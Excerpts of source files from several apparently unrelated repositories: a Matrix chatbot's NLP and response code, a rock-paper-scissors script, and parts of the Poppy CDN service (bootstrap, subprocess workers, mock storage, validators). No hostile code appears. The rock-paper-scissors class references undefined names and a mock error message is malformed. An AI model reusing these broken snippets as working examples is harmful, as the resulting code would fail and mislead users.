cursor.execute("CREATE TABLE IF NOT EXISTS data_basis (id SERIAL PRIMARY KEY, domain_description_id integer, original text, topic VARCHAR(255), response VARCHAR(255), FOREIGN KEY (domain_description_id) REFERENCES domain_description(id))")
cursor.execute("CREATE TABLE IF NOT EXISTS salt (id SERIAL PRIMARY KEY, value text)")
cursor.execute("CREATE TABLE IF NOT EXISTS room (id SERIAL PRIMARY KEY, room_id text, user_client_id integer, FOREIGN KEY (user_client_id) REFERENCES user_client(id) )")
connection.commit() #commit changes
cursor.close()
connection.close()
#python interpreter calls create_tables function
if __name__ == '__main__':
create_tables()
```
#### File: Matrix-Chatbot/modules/nlp.py
```python
import sys
import nltk
import re
from nltk.stem import WordNetLemmatizer
from nltk.tokenize import RegexpTokenizer
from nltk.corpus import stopwords
from nltk.corpus import brown
from autocorrect import Speller
sys.path.append("./../")
from services.database_service import (data_basis_query, get_number_of_links_to_be_shown,
set_number_of_links_to_be_shown, get_concerning_links, get_next_links)
'''
Natural Language Processing Strategy
1. Conversion to lowercase letters
2. Remove special characters
3. Tokenization
4. Remove spelling errors
5. Lemmatization
6. Remove stop words
'''
def language_processing(message):
'''method is called first'''
lowercased = lowercase(message)
remove_noises = noise_removal(lowercased)
tokens = tokenization(remove_noises)
after_spell_checking = remove_spelling_errors(tokens)
after_lemmatization = lemmatization(after_spell_checking)
final_message = remove_stop_words(after_lemmatization)
return lowercased, final_message, tokens, after_lemmatization #returns tuple
def lowercase(text):
'''lowercasing every letter in string'''
message = text.lower()
return message
def noise_removal(text):
'''remove special char, every character besieds letters and numbers'''
text = re.sub(r'([^a-zA-Z0-9\s]+?)', '', text)
return text
def tokenization(message):
'''tokenize message, also whitespaces deleted'''
tokens = nltk.word_tokenize(message)
return tokens
def lemmatization(tokens):
'''lemmatization of tokens'''
lemmatizer = WordNetLemmatizer()
lemmatization_list = []
for token in tokens:
lemmatized = lemmatizer.lemmatize(token)
lemmatization_list.append(lemmatized)
return lemmatization_list
def remove_stop_words(list):
'''removal of german and english stop words'''
stop_words_english = set(stopwords.words('english'))
stop_words_german = set(stopwords.words('german'))
filtered_list = [w for w in list if not w in stop_words_english]
filtered_list = [w for w in filtered_list if not w in stop_words_german]
return filtered_list
def remove_spelling_errors(list):
'''remove spelling errors via speller module'''
spell = Speller()
new_list = []
for word in list:
word_new = spell(word)
new_list.append(word_new)
return new_list
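# Hedged usage sketch (assumes the required NLTK data packages, e.g. punkt/wordnet/stopwords, are installed):
# lowered, final_tokens, raw_tokens, lemmas = language_processing("The users were asking questions!")
# final_tokens then holds the lowercased, spell-checked, lemmatized tokens with stop words
# removed, e.g. something like ['user', 'asking', 'question'].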
```
#### File: Matrix-Chatbot/modules/response_management.py
```python
import sys
import random
sys.path.append("./../")
from services.database_service import (get_number_of_links_to_be_shown,
set_number_of_links_to_be_shown, get_concerning_links, get_next_links,
get_stats, increment_links_counter_for_helpful,
get_links_counter_for_helpful, update_modul_satisfaction,
get_last_module_of_user, create_new_message, update_last_module_of_user,
get_domain_name, get_last_message, get_organisation_text,
get_stats_preferred, get_user_language)
'''
this module receives the message evaluation and builds an
appropriate chatbot response
'''
def generate_response(user, message, original_message):
'''method that generates the final chatbot response based on evaluation'''
lowercase_only = message[0]
standardized_message = message[1]
help = message[2]
number_of_links = message[3]
show_more = message[4]
show_all = message[5]
stats_called = message[6]
message_contains_yes_or_no = message[7]
message_contains_thank_you = message[8]
changed_number_of_stats = message[9]
change_language = message[10]
links_from_multiple_modules = message[11]
links = message[12]
small_talk = message[13]
organisational = message[14]
response = ""
number_of_links_found = len(links)
language_of_user = get_user_language(user)[0]
#step 1: check if help called
if help == True:
if language_of_user == "english":
response = "Use 'links = X' to return X links by default. \n" + "Use 'show more' to display more links fitting the query. \n" + "Use 'show all' to display all links fitting the query. \n" + "Use 'stats' and add your module to receive the statistics. \n" + "Use 'stats = X' to return X stats by default. \n" + "Use 'language = english/german' to change my bot language."
else:
response = "Schreibe 'links = X' um standardmäßig X links zurückzugeben. \n" + "Mit 'zeig mehr' bekommst du mehr Links angezeigt. \n" + "Mit 'zeig alles' werden alle passenden Links zurückgegeben. \n" + "Tippe 'stats' und füge deinen Modulnamen hinzu, um die Statistiken abzurufen. \n" + "Mit 'stats = X' werden dir X Statistiken angezeigt.. \n" + "Mit 'language = englisch/deutsch' kannst du die Bot Sprache abändern."
create_new_message(user, original_message, lowercase_only, "", response)
return response
#step 2: check if number of links called, if number of stats changed or user language changed
if number_of_links == True or changed_number_of_stats == True or change_language == True:
#new number of links already set in message_evaluation module
if language_of_user == "english":
response = "I saved the changes."
else:
response = "Ich habe die Änderungen abgespeichert."
create_new_message(user, original_message, lowercase_only, "", response)
return response
#step 3: small talk and organisational domains
if len(small_talk) > 0:
response = response + small_talk[0] + " "
if len(organisational) > 0:
response = response + organisational[0] + "\n"
#step 4: add you're welcome if user thanked chatbot
if message_contains_thank_you == True:
if language_of_user == "english":
response = response + "You're welcome. "
else:
response = response + "Bitte. "
#step 5: return statistics if called
if stats_called != False:
output_stats = get_stats(stats_called) #returns sorted list of topics + question counter
if language_of_user == "english":
response = response + "Here are the most requested topics. \n \n"
else:
response = response + "Hier sind die am häufigsten angefragten Themen. \n \n"
number_of_stats_to_return = get_stats_preferred(user)[0]
if number_of_stats_to_return > len(output_stats):
number_of_stats_to_return = len(output_stats)
for j in range(0, number_of_stats_to_return):
if language_of_user == "english":
response = response + str(output_stats[j][0]) + " was requested " + str(output_stats[j][1]) + " times. \n"
else:
response = response + str(output_stats[j][0]) + " wurde " + str(output_stats[j][1]) + "-mal angefragt. \n"
create_new_message(user, original_message, lowercase_only, "", response)
return response
#step 6: check if show more or show all called
if show_more == True:
links_last_message_more = get_next_links(user)
response = response + links_last_message_more
if show_all == True:
links_last_message_all = get_concerning_links(user)
response = response + links_last_message_all[0]
#step 7: add fitting links (response from domain) if necessary
if number_of_links_found > 0:
if links_from_multiple_modules != False:
if language_of_user == "english":
response = response + "I've found fitting results from the following modules: \n" + links_from_multiple_modules + "Which module are you interested in?"
else:
response = response + "Ich habe zu den folgenden Modulen passende Resultate erhalten: \n" + links_from_multiple_modules + "Welches Modul interessiert dich??"
all_links_db = list_to_string(links)
create_new_message(user, original_message, lowercase_only, all_links_db, response)
return response
how_many_links_to_show = get_number_of_links_to_be_shown(user)
increment_links_counter_for_helpful(user)
how_many_links_to_show = int(how_many_links_to_show)
if language_of_user == "english":
response = response + "I've found " + str(number_of_links_found) + " results. "
else:
response = response + "Ich habe " + str(number_of_links_found) + " Resultate gefunden. "
for i in range(0, number_of_links_found):
if i == 0:
#get domain name of best fitting response
module = get_domain_name(links[i])[0]
update_last_module_of_user(user, module)
if i < how_many_links_to_show:
response = response + links[i] + "\n" + "\n"
else:
break
#step 8: add "is my answer helpful" after every 5th link interaction
counter = get_links_counter_for_helpful(user)
if counter[0] % 5 == 0:
if language_of_user == "english":
response = response + "Is my answer helpful?"
else:
response = response + "War meine Antwort hilfreich?"
#step 9: check if user answered with "yes" or "no" after "if answer was helpful"
else:
if message_contains_yes_or_no != False:
counter = get_links_counter_for_helpful(user)
if counter[0] % 5 == 0:
last_message = get_last_message(user)[0]
helpful_string_english = "Is my answer helpful?"
helpful_string_german = "War meine Antwort hilfreich?"
if helpful_string_english in last_message or helpful_string_german in last_message:
if language_of_user == "english":
response = response + "Thanks for your feedback!"
else:
response = response + "Danke für dein Feedback!"
last_module = get_last_module_of_user(user)[0]
update_modul_satisfaction(last_module, message_contains_yes_or_no)
create_new_message(user, original_message, lowercase_only, "", response)
return response
#step 10: check if default answer is necessary
if response == "":
if message_contains_yes_or_no != False:
return response
#random chosing of default message
if language_of_user == "english":
default_1 = "Can you please specify your question?"
default_2 = "I haven't found anything fitting."
default_3 = "I've found no match to your question."
default_4 = "I can't answer that."
else:
default_1 = "Kannst du deine Frage bitte spezifizieren?"
default_2 = "Ich kenne keine passende Antwort."
default_3 = "Ich habe keine Übereinstimmung gefunden."
default_4 = "Das kann ich nicht beantworten."
default_answer = [default_1, default_2, default_3, default_4]
response = random.choice(default_answer)
all_links_db = list_to_string(links)
if all_links_db == "":
if show_more == True:
all_links_db = get_concerning_links(user) #wrong
if show_all == True:
all_links_db = links_last_message_all[0]
create_new_message(user, original_message, lowercase_only, all_links_db, response)
return response
def list_to_string(links):
'''method that transforms a list into a string'''
final = ""
for i in range(0, len(links)):
final = final + links[i] + "\n" + "\n"
return final
``` |
{
"source": "jqwez/rock_paper_scissors_gui",
"score": 4
} |
#### File: jqwez/rock_paper_scissors_gui/rockpaper_objectoriented.py
```python
import random
class Game:
def __init__(self):
run_game()
class HumanPlayer(record):
def __init__(self, x, y, name):
self.x = all_time_record
self.y = current_record
self.name = player_name
def throw_rock(self):
player_throw = "rock"
def throw_paper(self):
player_throw = "paper"
def throw_scissors(self):
player_throw = "scissors"
class ComputerPlayer:
def __init__(self, x, y):
self.x = all_time_record
self.y = current_record
def throw(self):
throw = random.choice(["rock", "paper", "scissors"])
``` |
{
"source": "jqxin2006/poppy",
"score": 2
} |
#### File: poppy/poppy/bootstrap.py
```python
from oslo.config import cfg
from stevedore import driver
from stevedore import named
from poppy.common import decorators
from poppy.openstack.common import log
LOG = log.getLogger(__name__)
_DEFAULT_OPTIONS = [
cfg.StrOpt('datacenter', default='',
help='Host datacenter of the API'),
cfg.BoolOpt('project_id_in_url', default=False,
help='Indicating if the project id'
' should be presented in the url')
]
_DRIVER_OPTIONS = [
cfg.StrOpt('transport', default='pecan',
help='Transport driver to use'),
cfg.StrOpt('manager', default='default',
help='Manager driver to use'),
cfg.StrOpt('storage', default='mockdb',
help='Storage driver to use'),
cfg.ListOpt('providers', default=['mock'],
help='Provider driver(s) to use'),
cfg.StrOpt('dns', default='default',
help='DNS driver to use'),
]
_DRIVER_GROUP = 'drivers'
class Bootstrap(object):
"""Defines the CDN bootstrapper.
The bootstrap loads up drivers per a given configuration, and
manages their lifetimes.
"""
def __init__(self, conf):
self.conf = conf
self.conf.register_opts(_DEFAULT_OPTIONS)
self.conf.register_opts(_DRIVER_OPTIONS, group=_DRIVER_GROUP)
self.driver_conf = self.conf[_DRIVER_GROUP]
log.setup('poppy')
LOG.debug("init bootstrap")
@decorators.lazy_property(write=False)
def dns(self):
"""DNS."""
LOG.debug((u'Loading DNS driver'))
# create the driver manager to load the appropriate drivers
dns_type = 'poppy.dns'
dns_name = self.driver_conf.dns
args = [self.conf]
try:
mgr = driver.DriverManager(namespace=dns_type,
name=dns_name,
invoke_on_load=True,
invoke_args=args)
return mgr.driver
except RuntimeError as exc:
LOG.exception(exc)
@decorators.lazy_property(write=False)
def provider(self):
"""provider.
:returns mgr
"""
LOG.debug((u'Loading provider extension(s)'))
# create the driver manager to load the appropriate drivers
provider_type = 'poppy.provider'
args = [self.conf]
provider_names = self.driver_conf.providers
mgr = named.NamedExtensionManager(namespace=provider_type,
names=provider_names,
invoke_on_load=True,
invoke_args=args)
return mgr
@decorators.lazy_property(write=False)
def storage(self):
"""storage.
:returns mgr driver
"""
LOG.debug((u'Loading storage driver'))
# create the driver manager to load the appropriate drivers
storage_type = 'poppy.storage'
storage_name = self.driver_conf.storage
args = [self.conf]
try:
mgr = driver.DriverManager(namespace=storage_type,
name=storage_name,
invoke_on_load=True,
invoke_args=args)
return mgr.driver
except RuntimeError as exc:
LOG.exception(exc)
@decorators.lazy_property(write=False)
def manager(self):
"""manager.
:returns mgr driver
"""
LOG.debug((u'Loading manager driver'))
# create the driver manager to load the appropriate drivers
manager_type = 'poppy.manager'
manager_name = self.driver_conf.manager
args = [self.conf, self.storage, self.provider, self.dns]
try:
mgr = driver.DriverManager(namespace=manager_type,
name=manager_name,
invoke_on_load=True,
invoke_args=args)
return mgr.driver
except RuntimeError as exc:
LOG.exception(exc)
@decorators.lazy_property(write=False)
def transport(self):
"""transport.
:returns mgr driver
"""
LOG.debug("loading transport")
# create the driver manager to load the appropriate drivers
transport_type = 'poppy.transport'
transport_name = self.driver_conf.transport
args = [self.conf, self.manager]
LOG.debug((u'Loading transport driver: %s'), transport_name)
try:
mgr = driver.DriverManager(namespace=transport_type,
name=transport_name,
invoke_on_load=True,
invoke_args=args)
return mgr.driver
except RuntimeError as exc:
LOG.exception(exc)
def run(self):
self.transport.listen()
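# Hedged usage sketch (mirrors how the worker scripts in this repo construct a Bootstrap):
# from oslo.config import cfg
# conf = cfg.CONF
# conf(project='poppy', prog='poppy', args=[])
# server = Bootstrap(conf)
# server.run()  # lazily loads the transport/manager/storage/provider/dns drivers, then listens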
```
#### File: poppy/common/util.py
```python
import pprint
class dict2obj(object):
"""Creates objects that behave much like a dictionaries."""
def __init__(self, d):
for k in d:
if isinstance(d[k], dict):
self.__dict__[k] = dict2obj(d[k])
elif isinstance(d[k], (list, tuple)):
l = []
for v in d[k]:
if isinstance(v, dict):
l.append(dict2obj(v))
else:
l.append(v)
self.__dict__[k] = l
else:
self.__dict__[k] = d[k]
def __getitem__(self, name):
if name in self.__dict__:
return self.__dict__[name]
def __iter__(self):
return iter(self.__dict__.keys())
def __repr__(self):
return pprint.pformat(self.__dict__)
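# Hedged usage sketch of dict2obj (example values are illustrative):
# obj = dict2obj({'origin': 'mywebsite.com', 'rules': [{'name': 'index'}]})
# obj.origin        -> 'mywebsite.com'
# obj.rules[0].name -> 'index'
# obj['origin']     -> 'mywebsite.com'  (dictionary-style access also works)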
```
#### File: default/service_async_workers/create_service_worker.py
```python
import argparse
import json
import logging
import os
from oslo.config import cfg
from poppy import bootstrap
from poppy.model.helpers import provider_details
from poppy.openstack.common import log
from poppy.transport.pecan.models.request import service
LOG = log.getLogger(__file__)
conf = cfg.CONF
conf(project='poppy', prog='poppy', args=[])
def service_create_worker(providers_list_json,
project_id, service_id, service_obj_json):
LOG.logger.setLevel(logging.INFO)
bootstrap_obj = bootstrap.Bootstrap(conf)
service_controller = bootstrap_obj.manager.services_controller
providers_list = json.loads(providers_list_json)
service_obj = service.load_from_json(json.loads(service_obj_json))
responders = []
# try to create all service from each provider
for provider in providers_list:
LOG.info('Starting to create service from %s' % provider)
responder = service_controller.provider_wrapper.create(
service_controller._driver.providers[provider],
service_obj)
responders.append(responder)
LOG.info('Create service from %s complete...' % provider)
# create dns mapping
dns = service_controller.dns_controller
dns_responder = dns.create(responders)
provider_details_dict = {}
for responder in responders:
for provider_name in responder:
if 'error' in responder[provider_name]:
error_msg = responder[provider_name]['error']
error_info = responder[provider_name]['error_detail']
provider_details_dict[provider_name] = (
provider_details.ProviderDetail(
error_info=error_info,
status='failed',
error_message=error_msg))
elif 'error' in dns_responder[provider_name]:
error_msg = dns_responder[provider_name]['error']
error_info = dns_responder[provider_name]['error_detail']
provider_details_dict[provider_name] = (
provider_details.ProviderDetail(
error_info=error_info,
status='failed',
error_message=error_msg))
else:
access_urls = dns_responder[provider_name]['access_urls']
provider_details_dict[provider_name] = (
provider_details.ProviderDetail(
provider_service_id=responder[provider_name]['id'],
access_urls=access_urls))
if 'status' in responder[provider_name]:
provider_details_dict[provider_name].status = (
responder[provider_name]['status'])
else:
provider_details_dict[provider_name].status = 'deployed'
service_controller.storage_controller.update_provider_details(
project_id,
service_id,
provider_details_dict)
service_controller.storage_controller._driver.close_connection()
LOG.info('Create service worker process %s complete...' %
str(os.getpid()))
if __name__ == '__main__':
bootstrap_obj = bootstrap.Bootstrap(conf)
parser = argparse.ArgumentParser(description='Create service async worker'
' script arg parser')
parser.add_argument('providers_list_json', action="store")
parser.add_argument('project_id', action="store")
parser.add_argument('service_id', action="store")
parser.add_argument('service_obj_json', action="store")
result = parser.parse_args()
providers_list_json = result.providers_list_json
project_id = result.project_id
service_id = result.service_id
service_obj_json = result.service_obj_json
LOG.logger.setLevel(logging.INFO)
service_create_worker(providers_list_json, project_id,
service_id, service_obj_json)
```
#### File: default/service_async_workers/sub_process_proxy.py
```python
import os
import subprocess
import sys
try:
import uwsgi
use_uwsgi = True
except ImportError:
use_uwsgi = False
from poppy.openstack.common import log
LOG = log.getLogger(__name__)
if use_uwsgi:
executable = os.path.join(uwsgi.opt['virtualenv'], 'bin', 'python')
else:
executable = sys.executable
def main(*args):
cmd_list = [executable] + list(args[1:])
LOG.info("Starting subprocess %s")
subprocess.Popen(cmd_list, stdout=sys.stdout, env=os.environ.copy())
sys.exit()
if __name__ == '__main__':
main(*sys.argv)
```
#### File: manager/default/services.py
```python
import json
import os
import subprocess
import sys
try:
import uwsgi
use_uwsgi = True
except ImportError:
use_uwsgi = False
import jsonpatch
import jsonschema
from poppy.common import errors
from poppy.manager import base
from poppy.model import service
from poppy.openstack.common import log
from poppy.transport.validators.schemas import service as service_schema
from poppy.transport.validators.stoplight import exceptions
LOG = log.getLogger(__name__)
class DefaultServicesController(base.ServicesController):
"""Default Services Controller."""
def __init__(self, manager):
super(DefaultServicesController, self).__init__(manager)
self.storage_controller = self._driver.storage.services_controller
self.flavor_controller = self._driver.storage.flavors_controller
self.dns_controller = self._driver.dns.services_controller
def _get_provider_details(self, project_id, service_id):
try:
provider_details = self.storage_controller.get_provider_details(
project_id,
service_id)
except Exception:
raise LookupError(u'Service {0} does not exist'.format(
service_id))
return provider_details
def list(self, project_id, marker=None, limit=None):
"""list.
:param project_id
:param marker
:param limit
:return list
"""
return self.storage_controller.list(project_id, marker, limit)
def get(self, project_id, service_id):
"""get.
:param project_id
:param service_id
:return controller
"""
return self.storage_controller.get(project_id, service_id)
def create(self, project_id, service_obj):
"""create.
:param project_id
:param service_obj
:raises LoookupError, ValueError
"""
try:
flavor = self.flavor_controller.get(service_obj.flavor_id)
# raise a lookup error if the flavor is not found
except LookupError as e:
raise e
providers = [p.provider_id for p in flavor.providers]
service_id = service_obj.service_id
try:
self.storage_controller.create(
project_id,
service_obj)
# ValueError will be raised if the service has already existed
except ValueError as e:
raise e
proxy_path = os.path.join(os.path.dirname(os.path.abspath(__file__)),
'service_async_workers',
'sub_process_proxy.py')
script_path = os.path.join(os.path.dirname(os.path.abspath(__file__)),
'service_async_workers',
'create_service_worker.py')
if use_uwsgi:
executable = os.path.join(uwsgi.opt['virtualenv'], 'bin', 'python')
else:
executable = sys.executable
cmd_list = [executable,
proxy_path,
script_path,
json.dumps(providers),
project_id, service_id,
json.dumps(service_obj.to_dict())]
LOG.info('Starting create service subprocess: %s' % cmd_list)
p = subprocess.Popen(cmd_list, env=os.environ.copy())
p.communicate()
return
def update(self, project_id, service_id, service_updates):
"""update.
:param project_id
:param service_id
:param service_updates
"""
# get the current service object
service_old = self.storage_controller.get(project_id, service_id)
if service_old.status != u'deployed':
raise errors.ServiceStatusNotDeployed(
u'Service {0} not deployed'.format(service_id))
service_old_dict = service_old.to_dict()
service_obj_dict = jsonpatch.apply_patch(
service_old_dict, service_updates)
service_obj = service.Service.init_from_dict(service_obj_dict)
# validate the updates
service_obj_json = json.loads(json.dumps(service_obj.to_dict()))
del service_obj_json['status']
del service_obj_json['provider_details']
del service_obj_json['service_id']
patch_schema = service_schema.ServiceSchema.get_schema("service",
"POST")
errors_list = list(
jsonschema.Draft3Validator(patch_schema).iter_errors(
service_obj_json))
if len(errors_list) > 0:
details = dict(errors=[{
'message': '-'.join([
"[%s]" % "][".join(repr(p) for p in error.path),
str(getattr(error, "message", error))
])}
for error in errors_list])
raise exceptions.ValidationFailed(json.dumps(details))
# get provider details for this service
provider_details = self._get_provider_details(project_id, service_id)
# set status in provider details to u'update_in_progress'
for provider in provider_details:
provider_details[provider].status = u'update_in_progress'
self.storage_controller.update_provider_details(
project_id,
service_id,
provider_details)
proxy_path = os.path.join(os.path.dirname(os.path.abspath(__file__)),
'service_async_workers',
'sub_process_proxy.py')
script_path = os.path.join(os.path.dirname(os.path.abspath(__file__)),
'service_async_workers',
'update_service_worker.py')
if use_uwsgi:
executable = os.path.join(uwsgi.opt['virtualenv'], 'bin', 'python')
else:
executable = sys.executable
cmd_list = [executable,
proxy_path,
script_path,
project_id, service_id,
json.dumps(service_old.to_dict()),
json.dumps(service_obj.to_dict())]
LOG.info('Starting update service subprocess: %s' % cmd_list)
p = subprocess.Popen(cmd_list, env=os.environ.copy())
p.communicate()
return
def delete(self, project_id, service_id):
"""delete.
:param project_id
:param service_id
:raises LookupError
"""
provider_details = self._get_provider_details(project_id, service_id)
# change each provider detail's status to delete_in_progress
# TODO(tonytan4ever): what if this provider is in 'failed' status?
# Maybe raising a 400 error here ?
for provider in provider_details:
provider_details[provider].status = "delete_in_progress"
self.storage_controller.update_provider_details(
project_id,
service_id,
provider_details)
proxy_path = os.path.join(os.path.dirname(os.path.abspath(__file__)),
'service_async_workers',
'sub_process_proxy.py')
script_path = os.path.join(os.path.dirname(os.path.abspath(__file__)),
'service_async_workers',
'delete_service_worker.py')
if use_uwsgi:
executable = os.path.join(uwsgi.opt['virtualenv'], 'bin', 'python')
else:
executable = sys.executable
cmd_list = [executable,
proxy_path,
script_path,
json.dumps(dict([(k, v.to_dict())
for k, v in provider_details.items()])),
project_id, service_id]
LOG.info('Starting delete service subprocess: %s' % cmd_list)
p = subprocess.Popen(cmd_list, env=os.environ.copy())
p.communicate()
return
def purge(self, project_id, service_id, purge_url=None):
'''If purge_url is None, all content of this service will be purged.'''
provider_details = self._get_provider_details(project_id, service_id)
# possible validation of purge url here...
proxy_path = os.path.join(os.path.dirname(os.path.abspath(__file__)),
'service_async_workers',
'sub_process_proxy.py')
script_path = os.path.join(os.path.dirname(os.path.abspath(__file__)),
'service_async_workers',
'purge_service_worker.py')
if use_uwsgi:
executable = os.path.join(uwsgi.opt['virtualenv'], 'bin', 'python')
else:
executable = sys.executable
cmd_list = [executable,
proxy_path,
script_path,
json.dumps(dict([(k, v.to_dict())
for k, v in provider_details.items()])),
project_id, service_id,
str(purge_url)]
LOG.info('Starting purge service subprocess: %s' % cmd_list)
p = subprocess.Popen(cmd_list, env=os.environ.copy())
p.communicate()
return
```
#### File: model/helpers/origin.py
```python
from poppy.model import common
class Origin(common.DictSerializableModel):
"""Origin."""
def __init__(self, origin, port=80, ssl=False, rules=[]):
self._origin = origin
self._port = port
self._ssl = ssl
self._rules = rules
@property
def origin(self):
"""origin."""
return self._origin
@origin.setter
def origin(self, value):
"""origin setter."""
self._origin = value
@property
def port(self):
"""port.
:returns port
"""
return self._port
@port.setter
def port(self, value):
"""port setter."""
self._port = value
@property
def ssl(self):
"""self.
:returns ssl
"""
return self._ssl
@ssl.setter
def ssl(self, value):
"""ssl setter."""
self._ssl = value
@property
def rules(self):
"""rules.
:returns rules
"""
return self._rules
@rules.setter
def rules(self, value):
"""rules setter."""
# TODO(tonytan4ever) this field should by typed too
self._rules = value
@classmethod
def init_from_dict(cls, dict_obj):
"""Construct a model instance from a dictionary.
This serves as a 2nd constructor
:param dict_obj: dictionary object
:returns o
"""
o = cls("unnamed")
o.origin = dict_obj.get("origin", "unnamed")
o.port = dict_obj.get("port", 80)
o.ssl = dict_obj.get("ssl", False)
return o
def to_dict(self):
result = common.DictSerializableModel.to_dict(self)
# need to deserialize the nested rules object
rules_obj_list = result['rules']
result['rules'] = [r.to_dict() for r in rules_obj_list]
return result
```
#### File: storage/mockdb/services.py
```python
import json
import uuid
from poppy.model.helpers import domain
from poppy.model.helpers import origin
from poppy.model.helpers import provider_details
from poppy.model import service
from poppy.storage import base
class ServicesController(base.ServicesController):
def __init__(self, driver):
super(ServicesController, self).__init__(driver)
self.created_service_ids = []
@property
def session(self):
return self._driver.database
def list(self, project_id, marker=None, limit=None):
provider_details_list = {
'MaxCDN': json.dumps(
{'id': 11942,
'access_urls': [{'operator_url': 'mypullzone.netdata.com'}]}),
'Mock': json.dumps(
{'id': 73242,
'access_urls': [{'operator_url': 'mycdn.mock.com'}]}),
'CloudFront': json.dumps(
{'id': '5ABC892',
'access_urls': [{'operator_url': 'cf123.cloudcf.com'}]}),
'Fastly': json.dumps(
{'id': 3488,
'access_urls':
[{'operator_url': 'mockcf123.fastly.prod.com'}]})}
services = []
for i in self.created_service_ids:
services = [{'service_id': i,
                         'service_name': uuid.uuid4(),
'domains': [json.dumps(
{'domain': 'www.mywebsite.com'})
],
'origins': [json.dumps({'origin': 'mywebsite.com',
'port': 80,
'ssl': False})],
'flavor_id': 'standard',
'caching': [{'name': 'default',
'ttl': 3600},
{'name': 'home',
'ttl': 17200,
'rules': [
{'name': 'index',
'request_url': '/index.htm'}
]},
{'name': 'images',
'ttl': 12800,
'rules': [{'name': 'images',
'request_url': '*.png'}]}],
'restrictions': [{'name': 'website only',
'rules': [{'name': 'mywebsite.com',
'http_host':
'www.mywebsite.com'}]}],
'provider_details': provider_details_list}]
services_result = []
for r in services:
service_result = self.format_result(r)
services_result.append(service_result)
return services_result
def get(self, project_id, service_id):
# get the requested service from storage
if service_id not in self.created_service_ids:
            raise ValueError("service {0} does not exist".format(service_id))
else:
origin_json = json.dumps({'origin': 'mywebsite.com',
'port': 80,
'ssl': False})
domain_json = json.dumps({'domain': 'www.mywebsite.com'})
provider_details_list = {
'MaxCDN': json.dumps(
{'id': 11942,
'access_urls': [
{'operator_url': 'mypullzone.netdata.com'}]}),
'Mock': json.dumps(
{'id': 73242,
'access_urls': [
{'operator_url': 'mycdn.mock.com'}]}),
'CloudFront': json.dumps(
{'id': '5ABC892',
'access_urls': [
{'operator_url': 'cf123.cloudcf.com'}]}),
'Fastly': json.dumps(
{'id': 3488,
'access_urls':
[{'operator_url': 'mockcf123.fastly.prod.com'}]})}
service_dict = {'service_id': service_id,
                            'service_name': uuid.uuid4(),
'domains': [domain_json],
'origins': [origin_json],
'flavor_id': 'standard',
'caching': [{'name': 'default',
'ttl': 3600},
{'name': 'home',
'ttl': 17200,
'rules': [
{'name': 'index',
'request_url': '/index.htm'}]},
{'name': 'images',
'ttl': 12800,
'rules': [{'name': 'images',
'request_url': '*.png'}]}],
'restrictions': [{'name': 'website only',
'rules': [
{'name': 'mywebsite.com',
'http_host':
'www.mywebsite.com'}]}],
'provider_details': provider_details_list}
service_result = self.format_result(service_dict)
return service_result
def create(self, project_id, service_obj):
if service_obj.service_id in self.created_service_ids:
raise ValueError("Service %s already exists." %
service_obj.service_id)
        # TODO(amitgandhinz): append the entire service
        # instead of just the name
        self.created_service_ids.append(service_obj.service_id)
def update(self, project_id, service_id, service_json):
# update configuration in storage
return ''
def delete(self, project_id, service_id):
if (service_id in self.created_service_ids):
self.created_service_ids.remove(service_id)
def get_provider_details(self, project_id, service_id):
if service_id not in self.created_service_ids:
raise ValueError("service: % does not exist")
else:
return {
'MaxCDN': provider_details.ProviderDetail(
provider_service_id=11942,
name='my_service_name',
access_urls=['my_service_name'
'.mycompanyalias.netdna-cdn.com']),
'Fastly': provider_details.ProviderDetail(
provider_service_id=3488,
name="my_service_name",
access_urls=['my_service_name'
'.global.prod.fastly.net']),
'CloudFront': provider_details.ProviderDetail(
provider_service_id=5892,
access_urls=['my_service_name'
'.gibberish.amzcf.com']),
'Mock': provider_details.ProviderDetail(
provider_service_id="73242",
access_urls=['my_service_name.mock.com'])}
def update_provider_details(self, project_id, service_name,
provider_details):
pass
@staticmethod
def format_result(result):
service_id = result.get('service_id')
        name = str(result.get('service_name'))
origins = [json.loads(o) for o in result.get('origins', [])]
domains = [json.loads(d) for d in result.get('domains', [])]
origins = [origin.Origin(o['origin'],
o.get('port', 80),
o.get('ssl', False))
for o in origins]
domains = [domain.Domain(d['domain']) for d in domains]
flavor_id = result.get('flavor_id')
s = service.Service(service_id, name, domains, origins, flavor_id)
provider_detail_results = result.get('provider_details') or {}
provider_details_dict = {}
for provider_name in provider_detail_results:
provider_detail_dict = json.loads(
provider_detail_results[provider_name])
provider_service_id = provider_detail_dict.get('id', None)
access_urls = provider_detail_dict.get('access_urls', [])
status = provider_detail_dict.get('status', u'unknown')
provider_detail_obj = provider_details.ProviderDetail(
provider_service_id=provider_service_id,
access_urls=access_urls,
status=status)
provider_details_dict[provider_name] = provider_detail_obj
s.provider_details = provider_details_dict
return s
```
#### File: poppy/transport/base.py
```python
import abc
import six
@six.add_metaclass(abc.ABCMeta)
class TransportDriverBase(object):
"""Base class for Transport Drivers to document the expected interface.
:param conf: configuration instance
:type conf: oslo.config.cfg.CONF
"""
def __init__(self, conf, manager):
self._conf = conf
self._manager = manager
self._app = None
@property
def app(self):
"""Get app.
:returns app
"""
return self._app
@property
def conf(self):
"""Get conf.
:returns conf
"""
return self._conf
@property
def manager(self):
"""Get manager
:returns manager
"""
return self._manager
@abc.abstractmethod
def listen(self):
"""Start listening for client requests (self-hosting mode).
:raises NotImplementedError
"""
raise NotImplementedError
```
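For illustration, a minimal concrete driver that satisfies the abstract interface above; the class name and the no-op `listen()` body are made up for this sketch, and the poppy package is assumed to be importable.

```python
from poppy.transport import base


class NoOpTransportDriver(base.TransportDriverBase):
    """Smallest possible driver: implements the one abstract method."""

    def listen(self):
        # a real driver would start its HTTP/WSGI server here
        print('listening with conf=%r manager=%r' % (self.conf, self.manager))


driver = NoOpTransportDriver(conf=None, manager=None)
driver.listen()
```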
#### File: transport/validators/schema_base.py
```python
from poppy.common import errors
from poppy.openstack.common.gettextutils import _
class SchemaBase(object):
schema = {}
@classmethod
def get_schema(cls, resource_name, operation):
"""Returns the schema for an operation
        :param resource_name: Name of the resource whose schema is
          to be retrieved.
        :type resource_name: `six.text_type`
:param operation: Operation for which params need
to be validated.
:type operation: `six.text_type`
:returns: Operation's schema
:rtype: dict
:raises: `errors.InvalidResource` if the resource
does not exist and `errors.InvalidOperation` if the operation
does not exist
"""
try:
resource_schemas = cls.schema[resource_name]
except KeyError:
# TODO(tonytan4ever): gettext support
msg = _('{0} is not a valid resource name').format(resource_name)
raise errors.InvalidResourceName(msg)
try:
return resource_schemas[operation]
except KeyError:
# TODO(tonytan4ever): gettext support
msg = _('{0} is not a valid operation for resource: {1}').format(
operation,
resource_name)
